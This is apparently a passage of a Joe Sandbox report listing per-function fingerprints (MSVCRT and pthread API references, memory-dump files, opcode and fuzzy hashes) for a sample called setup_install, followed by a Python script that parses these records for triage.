                                        • Associated: 00000002.00000002.1970064768.0000000064958000.00000002.00000001.01000000.00000007.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_64940000_setup_install.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotificationfree
                                        • String ID:
                                        • API String ID: 1312827883-0
                                        • Opcode ID: bb27001380121d7a2f50769ba6e6bffa61b32d023f17f2957943b2cc047f8ec1
                                        • Instruction ID: cd965a824dc5cfb7c5604f985122c3d899a9382dd78985044d2dd237e8dce9d3
                                        • Opcode Fuzzy Hash: bb27001380121d7a2f50769ba6e6bffa61b32d023f17f2957943b2cc047f8ec1
                                        • Instruction Fuzzy Hash: DDF0DA75A442159BEF10EFA5D8C4A8ABBB8FF142A4F0045A5ED54DB304E730D954CBE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: <sI$@
                                        • API String ID: 0-587643793
                                        • Opcode ID: a82394a4e17c0398070db6385731a91a00c211e4b698f1d31de4b8c100567f05
                                        • Instruction ID: 5bb628562ff52f380ec41ea378566bc3b127b606469abc6da8d36daa4fd3ef8f
                                        • Opcode Fuzzy Hash: a82394a4e17c0398070db6385731a91a00c211e4b698f1d31de4b8c100567f05
                                        • Instruction Fuzzy Hash: 38A195715083458FD720DF28C48476BBBE1BF85318F18487EE9859B396C379AC49CB9A
                                        APIs
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID: @
                                        • API String ID: 4206212132-2766056989
                                        • Opcode ID: 5c03e1a28fd9f9a9b2753ddf12bcadca885f571d98d795d340f012d286d827e2
                                        • Instruction ID: 8206b275c82f4b337f554e4dfcbf5417ec64c807d804c781dcb7f25f10cdaf35
                                        • Opcode Fuzzy Hash: 5c03e1a28fd9f9a9b2753ddf12bcadca885f571d98d795d340f012d286d827e2
                                        • Instruction Fuzzy Hash: EBE09B71A4C28445D7209A2481853B56BA49B43314F54647FE785771C6C33D8C8A551E
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: f7f923f6f1c2bfd5df8ad1dcee2c289ff288f95fc99e86222a58357fabbc21f8
                                        • Instruction ID: b5ddc3ac0911d3f5a4060d3e7d9b55aceccb5d4aeb8e47ff2019adff0d57ef42
                                        • Opcode Fuzzy Hash: f7f923f6f1c2bfd5df8ad1dcee2c289ff288f95fc99e86222a58357fabbc21f8
                                        • Instruction Fuzzy Hash: 34210032B082144FC714DF59D8C16A5B3F5EBC1318F19817EE9489B355C27DBC0997A9
                                        APIs
                                        • abort.MSVCRT ref: 00499631
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 29e4810561e077e0b5a2c9aa4f8069a1023e4ed6b819425b4f2eef8c9f2bcfa6
                                        • Instruction ID: 0a10dd1de590a7032342bea7d8f5ae5824155fb1de4fab0c046314440b7a937c
                                        • Opcode Fuzzy Hash: 29e4810561e077e0b5a2c9aa4f8069a1023e4ed6b819425b4f2eef8c9f2bcfa6
                                        • Instruction Fuzzy Hash: 8EB1F672E046259FC7048F68C4917A9BBE1BF45354F09817AEC59EB382C33DE9499BC4
                                        APIs
                                        • abort.MSVCRT ref: 0040F039
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 59069e251011435ec9291e001ee7b1d7df3d33ebd21d2671fe634590c5abd642
                                        • Instruction ID: bbb66e7f3a20be394f7072c3fb6fd4d3740fe3720d7d8d3395b6af0d2b7b8052
                                        • Opcode Fuzzy Hash: 59069e251011435ec9291e001ee7b1d7df3d33ebd21d2671fe634590c5abd642
                                        • Instruction Fuzzy Hash: 46316233A091118FD764AC2A64A116971D357C8374F6F0E7F9507F3380D97EAC56A189
                                        APIs
                                        • pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00496F3F), ref: 004114AA
                                        • pthread_once.LIBWINPTHREAD-1 ref: 004114EF
                                        • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004114FB
                                        • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411512
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: pthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_once
                                        • String ID:
                                        • API String ID: 3632289657-0
                                        • Opcode ID: 33e96c48d7095a5a9cd0e7ad6f4c8bd830534098fc9b7ebcb13ba4cbf6502de6
                                        • Instruction ID: 83bfdba2e1bf87fa2fc2f902711a05a6f9b0cba3c4f01d3acc29986a4f84f50a
                                        • Opcode Fuzzy Hash: 33e96c48d7095a5a9cd0e7ad6f4c8bd830534098fc9b7ebcb13ba4cbf6502de6
                                        • Instruction Fuzzy Hash: 1A516F70508705DFC710EF65C5C05AABBE5FF49748F01892ED6898B321E738E885CB9A
                                        APIs
                                        • abort.MSVCRT ref: 0040F039
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 2802d3f7ffed8754e936b01ee8e6498cff22f6939b23690c66105e2038b9400d
                                        • Instruction ID: 30e124ace15dbba61e50bb1f7dcdd6955a3dd839c3a2ddc209719e29f801fa44
                                        • Opcode Fuzzy Hash: 2802d3f7ffed8754e936b01ee8e6498cff22f6939b23690c66105e2038b9400d
                                        • Instruction Fuzzy Hash: 0B214D329082254BCB30EE2A80912B7B3A75B81354F5C093BD551737D2D23EEC1A92CE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b80ac38c7acb1ffc6043e86f908fb127d98ca8af4417afda3da38314851e14a
                                        • Instruction ID: 1712310ff677c6e924aa56f116842d97a1bdc6b7f9c1f8319dbf33463218090c
                                        • Opcode Fuzzy Hash: 8b80ac38c7acb1ffc6043e86f908fb127d98ca8af4417afda3da38314851e14a
                                        • Instruction Fuzzy Hash: F00161729082511BE7249A26C456375AAD18B82348F04447FEAA2677C3C53DCC47925D
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3055046cfbd0de2c0c9f23a5069084da6a159ae29afc094f35837725654855a9
                                        • Instruction ID: 79ec71f74329095f6696feb7df9a4166e10158c2bd9ec3302e9d13eacdcd7194
                                        • Opcode Fuzzy Hash: 3055046cfbd0de2c0c9f23a5069084da6a159ae29afc094f35837725654855a9
                                        • Instruction Fuzzy Hash: FD0166728086160BDB209E2984003B6BBD1EF82314F59887ACA8137382C63CAC1256CC
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: 2fcfee8aabd778d64db534bf6e43aadcc4d28b80d37252eb6a6c5622f20ed807
                                        • Instruction ID: 03cf69813cde9077153431dcbc9252be9c6caf13a4dcfe703bcaeb3274cb744f
                                        • Opcode Fuzzy Hash: 2fcfee8aabd778d64db534bf6e43aadcc4d28b80d37252eb6a6c5622f20ed807
                                        • Instruction Fuzzy Hash: 4DF0A9316083158BC710EF19E4411BAF7F5EF45355F400D3FE599A3251D339E9198699
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: eaa4741039abefe21291fa2710eef4dd58a6148a36f4639c05576c8844b480a1
                                        • Instruction ID: 574f13a9adc7fd23449c4731b1980048cb77c0db64a0c2182d4dae25f5aa0e92
                                        • Opcode Fuzzy Hash: eaa4741039abefe21291fa2710eef4dd58a6148a36f4639c05576c8844b480a1
                                        • Instruction Fuzzy Hash: 98F0C87290836507D724AE158451375BBA09B42318F58087FDDA237382C23EEC57969E
                                        APIs
                                        • abort.MSVCRT ref: 00499636
                                        • abort.MSVCRT ref: 0049963B
                                        • abort.MSVCRT ref: 00499640
                                        • abort.MSVCRT(0040FCCB), ref: 00499645
                                        • abort.MSVCRT(0040FCCB), ref: 0049964A
                                        • abort.MSVCRT(0040FCCB), ref: 0049964F
                                        • abort.MSVCRT(0040FCCB), ref: 00499654
                                        • abort.MSVCRT(0040FCCB), ref: 00499659
                                        • abort.MSVCRT(0040FCCB), ref: 0049965E
                                        • abort.MSVCRT(0040FCCB), ref: 00499663
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
                                        • abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968041815.00000000004A0000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968120859.00000000004AD000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968286647.00000000004E7000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.00000000004EB000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000002.00000002.1968347068.000000000050E000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: abort
                                        • String ID:
                                        • API String ID: 4206212132-0
                                        • Opcode ID: f2a531fe56fae01eb129bbdfb363083d6eb4acca61ee05b22db7c7a2d810f2af
                                        • Instruction ID: 02f552c7384f49c4b9b023fe1bd18d223b4938769ace1abbcccc49ddba7301a0
                                        • Opcode Fuzzy Hash: f2a531fe56fae01eb129bbdfb363083d6eb4acca61ee05b22db7c7a2d810f2af
                                        • Instruction Fuzzy Hash: A6F0827280C3468AD771AE168145275BBE4AB42314F985C6FDE81333D2823CAC56969F
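The records above are the report's per-function fingerprints (API references, memory-dump provenance, opcode and instruction hashes). To triage a report of this size it helps to parse them into structured rows, so that functions with an unusual import set stand out and a run of references to one API can be told apart from many distinct call sites. The Python below is an added example, not Joe Sandbox code: the record layout is inferred from the text on this page rather than from a published specification, the sample input is two records copied (abridged) from the report above, and the reading of a constant 5-byte stride between references as a block of adjacent call/jmp stubs is an assumption, not something the report states.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source /
Similarity blocks) and summarise their API references.
Added example, not Joe Sandbox code; layout inferred from the report text."""
import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: two records copied (abridged) from the report above,
# a libwinpthread function and a function with a run of abort references.
SAMPLE = """\
APIs
• pthread_getspecific.LIBWINPTHREAD-1(?,?,?,?,?,?,?,?,?,?,00496F3F), ref: 004114AA
• pthread_once.LIBWINPTHREAD-1 ref: 004114EF
• pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004114FB
• pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00411512
Memory Dump Source
• Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1967888228.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
Similarity
• API ID: pthread_getspecificpthread_mutex_lockpthread_mutex_unlockpthread_once
• String ID:
• API String ID: 3632289657-0
• Opcode ID: 33e96c48d7095a5a9cd0e7ad6f4c8bd830534098fc9b7ebcb13ba4cbf6502de6
• Instruction Fuzzy Hash: 1A516F70508705DFC710EF65C5C05AABBE5FF49748F01892ED6898B321E738E885CB9A
APIs
• abort.MSVCRT ref: 00499636
• abort.MSVCRT ref: 0049963B
• abort.MSVCRT ref: 00499640
• abort.MSVCRT(0040FCCB), ref: 00499645
• abort.MSVCRT(0040FCCB), ref: 0049964A
• abort.MSVCRT(0040FCCB), ref: 0049964F
• abort.MSVCRT(0040FCCB), ref: 00499654
• abort.MSVCRT(0040FCCB), ref: 00499659
• abort.MSVCRT(0040FCCB), ref: 0049965E
• abort.MSVCRT(0040FCCB), ref: 00499663
• abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499668
• abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499670
• abort.MSVCRT(?,?,20247C8B,?,0041CEA0,474E5543,004104BE), ref: 00499675
Memory Dump Source
• Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: abort
• Opcode ID: 2fcfee8aabd778d64db534bf6e43aadcc4d28b80d37252eb6a6c5622f20ed807
• Instruction Fuzzy Hash: 4DF0A9316083158BC710EF19E4411BAF7F5EF45355F400D3FE599A3251D339E9198699
"""

# "name.MODULE(args), ref: ADDR" or "name.MODULE ref: ADDR"
API_REF = re.compile(r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[\w.\-]+?)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<addr>[0-9A-Fa-f]+)")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


@dataclass
class FunctionRecord:
    fields: dict = field(default_factory=dict)    # "Opcode ID", "Snapshot File", ...
    dumps: list = field(default_factory=list)     # Source File + Associated .sdmp names
    api_refs: list = field(default_factory=list)  # (api, module, address) in report order


def parse_records(text):
    """Split report text into records; 'Instruction Fuzzy Hash' closes each one."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs" and (m := API_REF.fullmatch(line)):
            cur.api_refs.append((m["api"], m["mod"], int(m["addr"], 16)))
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        # The HTML export fuses the "Download File" link label onto .sdmp names.
        value = value.removesuffix("Download File").strip()
        cur.fields.setdefault(key, value)
        if key in ("Source File", "Associated"):
            cur.dumps.append(value.split(",")[0].strip())
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records


def ref_strides(rec, api):
    """Byte distances between consecutive references to one API, by address."""
    addrs = sorted(a for n, _, a in rec.api_refs if n == api)
    return Counter(b - a for a, b in zip(addrs, addrs[1:]))


def summarise(records):
    """(opcode-id prefix, imported API names, dominant stride per API) per record.
    Assumption, not stated by the report: a constant 5-byte stride is a run of
    adjacent 5-byte call/jmp stubs, i.e. one thunk block rather than N call sites."""
    rows = []
    for r in records:
        apis = sorted({n for n, _, _ in r.api_refs})
        strides = {a: s.most_common(1)[0][0] for a in apis if (s := ref_strides(r, a))}
        rows.append((r.fields.get("Opcode ID", "")[:12], tuple(apis), strides))
    return rows


if __name__ == "__main__":
    for row in summarise(parse_records(SAMPLE)):
        print(row)
```

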